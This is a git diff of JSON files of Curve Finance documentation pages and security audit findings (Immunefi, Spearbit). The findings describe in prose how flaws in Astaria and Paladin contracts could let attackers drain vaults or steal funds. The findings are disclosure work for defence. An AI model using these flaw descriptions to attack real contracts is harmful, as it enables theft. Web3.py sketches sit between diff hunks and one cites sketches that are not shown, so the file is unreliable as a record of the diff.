+ { + "title": "Permissionless rewards", + "html_url": "https://resources.curve.fi/reward-gauges/permissionless-rewards/", + "body": "Guide to Set Any Token Reward on a Gauge This guide explains the process of setting any token reward using Etherscan. It assumes you possess some familiarity with Etherscan or are competent in executing this transaction through an alternative tool. Note that Curve has employed various gauge versions over time. If your attempts are unsuccessful, it might be due to version differences. Should you encounter repeated failures, please seek our assistance. Setting the Reward Token and Distributor Address Specify the reward token and the distributor address . The distributor address is the source from which the reward token will be sent to the gauge. Info Ensure you have the required admin/manager privileges for the gauge. The address that deployed the gauge is set as the admin/manager . If you are not the admin/manager, this call will fail. To identify the manager, check manager/admin in the \"Read Contract\" section on Etherscan.
Some versions of this contract may also allow the factory owner to execute this call. The deployer of the gauge is usually the manager of the gauge if the gauge was deployed via the Proxy of the Factory. If the gauge was deployed directly through the Factory contract itself, a quick migration needs to occur (see here). Call add_reward() on Etherscan This function should be called only once for a specific reward token. A repeated call to add_reward using a previously set reward token will fail. However, the distributor address for an already added reward token can be updated using the set_reward_distributor function. Over the lifetime of a gauge, a total of 8 different reward tokens can be set. As add_reward() is an admin-guarded function, you might need to call it from a ProxyContract. More information here. Info On sidechains, permissionless rewards are directly built into the gauges. Whoever deploys the gauge can call add_rewards on the gauge contract itself (no need to migrate or do it via proxy). add_reward(_reward_token: address, _distributor: address): Function to add a reward token and distributor. Parameters: _reward_token (address) - Reward Token Address; _distributor (address) - Distributor Address, who can add the Reward Token. Approving the Reward Token for Deposit Visit the reward token contract address on Etherscan and switch to the \"Write Contract\" tab. Use the approve() function, setting the spender as the gauge contract address and specifying the desired amount. Call approve() on Etherscan on the reward token contract approve(_spender: address, _value: uint256) -> bool: Function to approve _spender to transfer _value tokens. Parameters: _spender (address) - Gauge Contract Address; _value (uint256) - Amount to approve. Depositing the Reward Token Deposit the reward token to the contract. This action initiates the first reward epoch, lasting a week (defined as 604,800 seconds, i.e. 7 * 24 * 3600). If no additional reward token is deposited using the same function, this reward epoch ends after the week. Should you add new tokens during an ongoing epoch, both the new tokens and any remaining ones are combined, triggering a fresh week-long epoch. For consistent reward distributions, it's advisable to deposit near the end of an epoch. If replenishing mid-epoch, ensure you compute the appropriate amount for a steady distribution rate. For tokens with 18 decimals: 1 full token = 1 * 10^18 = 1000000000000000000. This function must be called using the distributor address. A previous distributor address or an admin can update the distributor address using set_reward_distributor() if necessary. Call deposit_reward_token() on Etherscan on the gauge deposit_reward_token(_reward_token: address, _amount: uint256): Function to deposit _amount of _reward_token into the gauge. Parameters: _reward_token (address) - Reward Token Address; _amount (uint256) - Amount to be distributed over the week. The full three-step flow is sketched below. 2023-10-28", "labels": [ "Documentation" ] },
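Here is a minimal web3.py (v6) sketch tying together the three Etherscan steps from the entry above (add_reward, approve, deposit_reward_token). The RPC endpoint, all addresses and the reduced ABI fragments are assumptions; gauge ABIs vary across versions, so verify the function set on the target gauge first. .transact() assumes the manager/distributor accounts are unlocked on the node; otherwise sign locally as in the earlier sketches.

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://eth.llamarpc.com"))  # assumed RPC endpoint
GAUGE, TOKEN = "0x...", "0x..."          # placeholders
MANAGER, DISTRIBUTOR = "0x...", "0x..."  # placeholders
WEEK_AMOUNT = 1_000 * 10**18  # 1,000 tokens (18 decimals), streamed over one week

ERC20_ABI = [{"name": "approve", "type": "function", "stateMutability": "nonpayable",
              "inputs": [{"name": "_spender", "type": "address"},
                         {"name": "_value", "type": "uint256"}],
              "outputs": [{"name": "", "type": "bool"}]}]
GAUGE_ABI = [{"name": "add_reward", "type": "function", "stateMutability": "nonpayable",
              "inputs": [{"name": "_reward_token", "type": "address"},
                         {"name": "_distributor", "type": "address"}], "outputs": []},
             {"name": "deposit_reward_token", "type": "function",
              "stateMutability": "nonpayable",
              "inputs": [{"name": "_reward_token", "type": "address"},
                         {"name": "_amount", "type": "uint256"}], "outputs": []}]

gauge = w3.eth.contract(address=GAUGE, abi=GAUGE_ABI)
token = w3.eth.contract(address=TOKEN, abi=ERC20_ABI)

# 1. Admin/manager registers the reward token and its distributor (once per token).
gauge.functions.add_reward(TOKEN, DISTRIBUTOR).transact({"from": MANAGER})
# 2. Distributor approves the gauge to pull the reward tokens.
token.functions.approve(GAUGE, WEEK_AMOUNT).transact({"from": DISTRIBUTOR})
# 3. Distributor deposits, starting a week-long (604,800 s) reward epoch.
gauge.functions.deposit_reward_token(TOKEN, WEEK_AMOUNT).transact({"from": DISTRIBUTOR})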
@@ -2162,15 +2194,15 @@ { "title": "Understanding gauges", "html_url": "https://resources.curve.fi/reward-gauges/understanding-gauges/", - "body": "Understanding Gauges Reviewing the gauge system, one of the Curve DAO's base features. The gauge system On Curve Finance, CRV inflation goes to users who provide liquidity. This usage is measured with gauges. The liquidity gauge measures how much a user is providing in liquidity: it measures how many dollars you have provided in a Curve pool. Each Curve pool has its own liquidity gauge where you can stake your liquidity provider tokens. The weight system Each gauge also has a weight and a type. Those weights represent how much of the daily CRV inflation will be received by the liquidity gauge. The DAO The weight system allows the Curve DAO to dictate where the CRV inflation should go. You can vote at this address: https://dao.curve.fi/gaugeweight By doing so, you can put your voting power towards the liquidity gauge (or pool) you think should receive the most CRV.
Last update: 2023-08-15", + "body": "Understanding gauges Reviewing the gauge system, one of the Curve DAO's base features. The gauge system On Curve Finance, CRV inflation goes to users who provide liquidity. This usage is measured with gauges. The liquidity gauge measures how much a user is providing in liquidity: it measures how many dollars you have provided in a Curve pool. Each Curve pool has its own liquidity gauge where you can stake your liquidity provider tokens. The weight system Each gauge also has a weight and a type. Those weights represent how much of the daily CRV inflation will be received by the liquidity gauge (a worked example follows this entry). The DAO The weight system allows the Curve DAO to dictate where the CRV inflation should go. You can vote at this address: https://dao.curve.fi/gaugeweight By doing so, you can put your voting power towards the liquidity gauge (or pool) you think should receive the most CRV. 2023-09-28", "labels": [ "Documentation" ] },
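A short worked example of the weight system described above: a gauge's relative weight is simply its share of the daily CRV inflation. All numbers here are illustrative assumptions, not protocol constants.

# A gauge's relative weight is its share of the daily CRV inflation.
daily_crv_inflation = 600_000   # assumed daily CRV emitted to gauges (illustrative)
gauge_relative_weight = 0.72    # e.g. a gauge holding 72% of the total weight

gauge_daily_crv = daily_crv_inflation * gauge_relative_weight
print(gauge_daily_crv)          # 432000.0 CRV/day shared by that gauge's stakers

# An LP staking 1% of that gauge's deposits (ignoring boost) would receive:
print(gauge_daily_crv * 0.01)   # 4320.0 CRV/day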
2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Cross asset swaps", + "title": "Cross-Asset swaps", "html_url": "https://resources.curve.fi/troubleshooting/cross-asset-swaps/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Cross asset swaps Table of contents Cross-Asset Swaps Settlement and completing your trade Technical Docs Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Cross-Asset Swaps Settlement and completing your trade Technical Docs Cross asset swaps Cross-Asset Swaps Cross-asset swaps are a new type of swaps on Curve using Synthetix as a bridge. There are a few things to know about them before getting started: They have very little slippage, they can handle seven and eight-figure trades with no slippage They take six minutes due to the Synthetix settlement period and prices can move during that period You can trade any asset as it shares a pool with a synth (sUSD/sETH/sBTC) They are in beta They are expensive (~$80 at 50 gwei) and therefore best suited for large trades They have two parts and thus two transactions Initiating the trade After selecting the two assets you would like to trade, click sell and confirm the first part of your transaction. For the route below, we will go from DAI to sUSD to sBTC to renBTC. The first part of the trade takes you to sBTC. Upon confirmation you will receive an NFT which represents your trade. The trade will immediately enter a settlement period of six minutes. It is best not to close your browser during that period. Settlement and completing your trade After Synthetix settlement period, you will then be able to complete your trade by clicking the Complete trade button. This second part will then take you from sBTC to renBTC. After confirming this transaction, you then receive your renBTC. 
Technical Docs Read the technical docs here: https://curve.readthedocs.io/cross-asset-swaps.html Last update: 2023-08-15", + "body": "Cross-Asset swaps Cross-asset swaps are a new type of swap on Curve using Synthetix as a bridge. There are a few things to know about them before getting started: They have very little slippage and can handle seven- and eight-figure trades. They take six minutes due to the Synthetix settlement period, and prices can move during that period. You can trade any asset as long as it shares a pool with a synth (sUSD/sETH/sBTC). They are in beta. They are expensive (~$80 at 50 gwei) and therefore best suited for large trades. They have two parts and thus two transactions. Initiating the trade After selecting the two assets you would like to trade, click sell and confirm the first part of your transaction. For the route below, we will go from DAI to sUSD to sBTC to renBTC. The first part of the trade takes you to sBTC. Upon confirmation you will receive an NFT which represents your trade. The trade will immediately enter a settlement period of six minutes. It is best not to close your browser during that period. Settlement and completing your trade After the Synthetix settlement period, you will be able to complete your trade by clicking the Complete trade button. This second part will then take you from sBTC to renBTC. After confirming this transaction, you receive your renBTC. Technical Docs Read the technical docs here: https://curve.readthedocs.io/cross-asset-swaps.html 2023-09-28", "labels": [ "Documentation" ] },
@@ -2178,7 +2210,7 @@ { "title": "Disabling crypto wallets in brave", "html_url": "https://resources.curve.fi/troubleshooting/disabling-crypto-wallets-in-brave/", - "body": "Disabling Crypto Wallets in Brave The native \"Crypto Wallets\" app in your Brave browser can often interfere with your web3 provider. When using Metamask, it is important to make sure Brave is pointing to it and not its native implementation. Pointing Brave to Metamask Open your web browser and paste the following in your URL bar: brave://settings/extensions Click the dropdown and switch to Metamask. You can also disable Crypto Wallets on startup.
Last update: 2023-08-15", + "body": "Disabling crypto wallets in brave The native \"Crypto Wallets\" app in your Brave browser can often interfere with your web3 provider. When using Metamask, it is important to make sure Brave is pointing to it and not its native implementation. Pointing Brave to Metamask Open your web browser and paste the following in your URL bar: brave://settings/extensions Click the dropdown and switch to Metamask. You can also disable Crypto Wallets on startup. 2023-09-28", "labels": [ "Documentation" ] },
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2186,15 +2218,15 @@ { "title": "Dropping and replacing a stuck transaction", "html_url": "https://resources.curve.fi/troubleshooting/dropping-and-replacing-a-stuck-transaction/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction Dropping and replacing a stuck transaction Table of contents Dropping and replacing a stuck transaction Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Dropping and replacing a stuck transaction Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction Dropping and replacing a stuck transaction Dropping and replacing a stuck transaction A short tutorial on dropping and replacing a stuck Ethereum transaction. You've submitted a transaction in Metamask and it just won't come through. Those gas estimates betrayed you and you're stuck looking at your pending transaction on Etherscan. It's happened to everyone and it's not pleasant but there's a fairly simple solution which most people will come to learn about. This guide isn't Curve Finance specific but as gas prices are reaching new highs, stuck transactions are getting more common and knowing how to drop and replace is thus become more and more useful. First and foremost, it's important to understand you can only do this if your transaction is pending. If it isn't your transaction cannot be cancelled anymore. If you want to understand how this works, you should know that Ethereum transactions must be submitted with an incremental nonce. Each transaction has a nonce (a number) assigned to it and a number cannot be skipped. The way to replace and drop is to submit a new transaction with a higher gas price and the same nonce. This will tell the miners this more expensive transaction is the one that should be mined and your stuck transaction will be discarded. Enable custom nonce in Metamask Visit Metamask and select \"Settings\", then \"Advanced\" and scroll down to find and enable \"Customize transaction nonce\". Finding your pending transaction nonce Visit your address on Etherscan and click on your pending transaction. 
If you scroll down you will find \"Nonce\": Write down this nonce and return to Metamask. Replacing your transaction Now that you have your nonce, go back to Metamask and send yourself 0 ETH; on the confirmation screen, type the nonce you got from Etherscan. Make sure your gas price is suitable this time, by checking https://ethgasstation.info/ for example. Confirm your transaction and that's it. Your 0 ETH transaction should be mined, which will drop and replace your stuck transaction, which you can confirm on Etherscan. Last update: 2023-08-15", + "body": "Dropping and replacing a stuck transaction A short tutorial on dropping and replacing a stuck Ethereum transaction. You've submitted a transaction in Metamask and it just won't come through. Those gas estimates betrayed you and you're stuck looking at your pending transaction on Etherscan. It's happened to everyone and it's not pleasant, but there's a fairly simple solution which most people come to learn about. This guide isn't Curve Finance specific, but as gas prices reach new highs, stuck transactions are getting more common, and knowing how to drop and replace has thus become more and more useful. First and foremost, it's important to understand you can only do this if your transaction is pending. If it isn't, your transaction cannot be cancelled anymore. If you want to understand how this works, you should know that Ethereum transactions must be submitted with an incremental nonce. Each transaction has a nonce (a number) assigned to it and a number cannot be skipped. The way to drop and replace is to submit a new transaction with a higher gas price and the same nonce (see the sketch after this entry). This tells the miners this more expensive transaction is the one that should be mined, and your stuck transaction will be discarded. Enable custom nonce in Metamask Visit Metamask and select \"Settings\", then \"Advanced\", and scroll down to find and enable \"Customize transaction nonce\". Finding your pending transaction nonce Visit your address on Etherscan and click on your pending transaction. If you scroll down you will find \"Nonce\": Write down this nonce and return to Metamask. Replacing your transaction Now that you have your nonce, go back to Metamask and send yourself 0 ETH; on the confirmation screen, type the nonce you got from Etherscan. Make sure your gas price is suitable this time, by checking https://ethgasstation.info/ for example. Confirm your transaction and that's it. Your 0 ETH transaction should be mined, which will drop and replace your stuck transaction, which you can confirm on Etherscan. 2023-09-28", "labels": [ "Documentation" ] },
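The same drop-and-replace trick can be done without Metamask. Here is a minimal web3.py (v6) sketch: re-send a 0 ETH transfer to yourself with the same nonce as the stuck transaction and a higher gas price. The RPC endpoint, the private key and the nonce value are placeholders/assumptions.

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://eth.llamarpc.com"))  # assumed RPC endpoint
acct = w3.eth.account.from_key("0x...")                    # placeholder private key

stuck_nonce = 42  # placeholder: the nonce shown on Etherscan for the pending tx

tx = {
    "to": acct.address, "value": 0,           # 0 ETH to yourself
    "nonce": stuck_nonce,                     # same nonce -> replaces the old tx
    "gas": 21_000, "chainId": 1,
    "gasPrice": int(w3.eth.gas_price * 1.2),  # must out-bid the stuck tx's price
}
signed = acct.sign_transaction(tx)
print(w3.eth.send_raw_transaction(signed.rawTransaction).hex())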
{ - "title": "Recovering a cross asset swap", + "title": "Recovering cross-asset swaps", "html_url": "https://resources.curve.fi/troubleshooting/recovering-a-cross-asset-swap/", - "body": "Recovering a cross-asset swap If Curve has lost track of your cross-asset swap, do not panic: there is a simple way to recover it. Finding the token id Visit your address on Etherscan and click on ERC721: Then click on your latest cross-asset swap; you should find a long string of numbers like below: Initiate recovery Visit: https://www.curve.fi/recover Enter your token id found on Etherscan, enter the token you would like to receive (if your token has sBTC then it must be a Bitcoin token that shares a pool with sBTC; if your token is sUSD, it should be a token that shares a pool with sUSD) and then click recover. Confirm your transaction and you're done.
Last update: 2023-08-15", + "body": "Recovering cross-asset swaps If Curve has lost track of your cross-asset swap, do not panic: there is a simple way to recover it. Finding the token id Visit your address on Etherscan and click on ERC721: Then click on your latest cross-asset swap; you should find a long string of numbers like below: Initiate recovery Visit: https://www.curve.fi/recover Enter your token id found on Etherscan, enter the token you would like to receive (if your token has sBTC then it must be a Bitcoin token that shares a pool with sBTC; if your token is sUSD, it should be a token that shares a pool with sUSD) and then click recover. Confirm your transaction and you're done. 2023-09-28", "labels": [ "Documentation" ] },
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2202,7 +2234,7 @@ { "title": "Support", "html_url": "https://resources.curve.fi/troubleshooting/support/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Support Table of contents Understanding Technical Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Technical Support Support Understanding Technical Support Curve is to be used entirely at your own risk. Admins have no special keys and cannot recover funds if sent improperly. However, a wide variety of resources are still available to help you avoid issues. If you have questions, please make sure to check with the following sources: This section contains common troubleshooting questions, as does the entirety of this documentation. The technical documentation is a comprehensive resource for coders. The Telegram channel is an active place to seek support. The Discord also has an active support channel. Most users use Curve without issue, however we understand it can be complicated so make sure to ask first and save yourself any possible trouble later! 
Last update: 2023-08-15", + "body": "Support Curve is to be used entirely at your own risk. Admins have no special keys and cannot recover funds if sent improperly. However, a wide variety of resources are still available to help you avoid issues. If you have questions, please make sure to check the following sources: This section contains common troubleshooting questions, as does the entirety of this documentation. The technical documentation is a comprehensive resource for coders. The Telegram channel is an active place to seek support. The Discord also has an active support channel. Most users use Curve without issue; however, we understand it can be complicated, so make sure to ask first and save yourself any possible trouble later!
2023-09-28 Back to top", "labels": [ "Documentation" ] diff --git a/results/immunefi_findings.json b/results/immunefi_findings.json index b165375..6d1e1b6 100644 --- a/results/immunefi_findings.json +++ b/results/immunefi_findings.json @@ -1,4 +1,52 @@ [ + { + "title": "Yield Protocol Logic Error", + "html_url": "https://medium.com/immunefi/yield-protocol-logic-error-bugfix-review-7b86741e6f50", + "body": "The vulnerability involved a potential exploit that could allow an attacker to drain the base tokens from a pool by manipulating the token balance of a contract.", + "labels": [ + "Logic" + ] + }, + { + "title": "Silo Finance Logic Error", + "html_url": "https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a", + "body": "The bug could manipulate the interest rate to borrow more funds than should have been allowed by the system.", + "labels": [ + "Logic" + ] + }, + { + "title": "DFX Finance Rounding Error", + "html_url": "https://medium.com/immunefi/dfx-finance-rounding-error-bugfix-review-17ba5ffb4114", + "body": "Rounding error with EURS token due to the non-standard decimal value of two.", + "labels": [ + "Logic" + ] + }, + { + "title": "Enzyme Finance Missing Privilege Check", + "html_url": "https://medium.com/immunefi/enzyme-finance-missing-privilege-check-bugfix-review-ddb5e87b8058", + "body": "This critical bug could have led to the draining of Enzyme's Vault.", + "labels": [ + "Missing Privilege Check" + ] + }, + { + "title": "Beanstalk Logic Error", + "html_url": "https://medium.com/immunefi/beanstalk-logic-error-bugfix-review-4fea17478716", + "body": "This critical logic error allowed theft of assets from the accounts that were approved for the Beanstalk contract.", + "labels": [ + "Logic" + ] + }, + { + "title": "Balancer Logic Error", + "html_url": "https://medium.com/immunefi/balancer-logic-error-bugfix-review-74f5edca8b1a", + "body": "This high severity bug allowed liquidity providers to submit duplicate claims and drain all the Merkle Orchad's assets from the Vault.", + "labels": [ + "Logic" + ] + }, { "title": "Moonbeam, Astar, And Acala Library Truncation Bugfix Review \u2014 $1m Payout", "html_url": "https://medium.com/immunefi/moonbeam-astar-and-acala-library-truncation-bugfix-review-1m-payout-41a862877a5b", diff --git a/results/spearbit_findings.json b/results/spearbit_findings.json index 56f492b..9c96f2b 100644 --- a/results/spearbit_findings.json +++ b/results/spearbit_findings.json @@ -1,17832 +1,21232 @@ [ { - "title": "LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When transferFrom is called, there is not check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners who are also owners of the vault's lien tokens, they can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, yIntercept, slope, last, epochData of VaultData need to be updated (this requires knowing the lien's end). 
However, private vaults do not keep a record of these values, and the corresponding values are only saved in stacks off-chain and validated on-chain using their hash.", + "title": "Verify user has indeed voted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "If an error is made in the merkle trees (either by accident or on purpose) a user that did not vote (in that period for that gauge) might get rewards assigned to him. Although the Paladin documentation says: \"the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period\", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: High Risk" ] }, { - "title": "Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block if receiver is a valid vault the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So for example any supplied private vault as a receiver would be allowed here and the call to _validateCommitment will continue without reverting at least in this if block. If we backtrack function calls to _validateCommitment, we arrive to 3 exposed endpoints: commitToLiens buyoutLien commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. 8 A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommit- ment to check whether it is allowed to be used and finally when transferring safeTransfer) wETH. This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V . 2. Takes a valid commitment C and combines it with V and supply those to commitToLien. 3. Calls withdraw endpoint of V to withdraw all the funds. For step 2. the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens and take all the commitments C0, (cid:1) (cid:1) (cid:1) , Cn and supply them one by one along with V to commitToLien endpoint of the vault that was specified by each Ci . 2. Frontrun calls to commitToLien endpoints of vaults, take their commitment C and combine it with V to send to commitToLien. 3. 
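Illustrative note on the recommendation above: Curve's GaugeController does expose per-user vote data through its public last_user_vote and vote_user_slopes mappings, so a script or spot-checker can confirm that an account actually voted for a gauge before it is given a place in the merkle tree. A minimal sketch under that assumption follows; VoteChecker and hasActiveVote are hypothetical names, not part of the audited code.

pragma solidity ^0.8.0;

interface IGaugeController {
    // timestamp of the user's last vote for this gauge
    function last_user_vote(address user, address gauge) external view returns (uint256);
    // the user's current vote for this gauge: (slope, power, end)
    function vote_user_slopes(address user, address gauge) external view returns (uint256 slope, uint256 power, uint256 end);
}

contract VoteChecker {
    IGaugeController public immutable gaugeController;

    constructor(address _gaugeController) {
        gaugeController = IGaugeController(_gaugeController);
    }

    // True if `user` has a vote for `gauge` that still contributes bias in `period`.
    function hasActiveVote(address user, address gauge, uint256 period) external view returns (bool) {
        (uint256 slope, , uint256 end) = gaugeController.vote_user_slopes(user, gauge);
        return slope != 0 && end > period;
    }
}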
Backrun the either scenarios from the above points and create a new commitment with new lien request that tries to max out the potential debt for a collateral while also keeping other inequalities valid (for example, the inequality regarding liquidationInitialAsk).", + "title": "Tokens could be sent / withdrawn multiple times by accident", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but in- terfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the periods, as closeQuestPeriod() checks the state of the first quest. 2. Suppose you have closed the second quest of a period via closePartOfQuestPeriod(), but closeQuest- Period() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor, again. Also, function closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues with future code changes. 5 function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... // We use the 1st QuestPeriod of this period to check it was not Closed uint256[] memory questsForPeriod = questsByPeriod[period]; require( ,! periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period \"QuestBoard: Period already closed\" ); ... // no further checks on currentState _questPeriod.withdrawableAmount = .... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again) ... } // sets withdrawableAmount (again) function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ,! ... _questPeriod.currentState = PeriodState.CLOSED; ... _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount; IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); ... } Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: High Risk" ] }, { - "title": "Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32(\"ACTIVE_AUCTION\") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: List the asset for sale on Seaport for 1 wei. Take the maximum possible loans against the asset. Buy the asset on Seaport for 1 wei. 
The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei).", + "title": "Limit possibilities of recoverERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function recoverERC20() in contract MultiMerkleDistributor.sol allows the retrieval of all ERC20 tokens from the MultiMerkleDistributor.sol whereas the comment indicates it is only meant to retrieve those tokens that have been sent by mistake. Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "validateStack allows any stack to be used with collateral with no liens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The validateStack modifier is used to confirm that a stack entered by a user matches the stateHash in storage. However, the function reverts under the following conditions: if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } The result is that any collateral with stateHash == bytes32(0) (which is all collateral without any liens taken against it yet) will accept any provided stack as valid. This can be used in a number of harmful ways. Examples of vulnerable endpoints are: createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can _mint any unminted liens which can DoS the system. _burn lienIds that they don't have the right to remove. manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyout- Lien. It 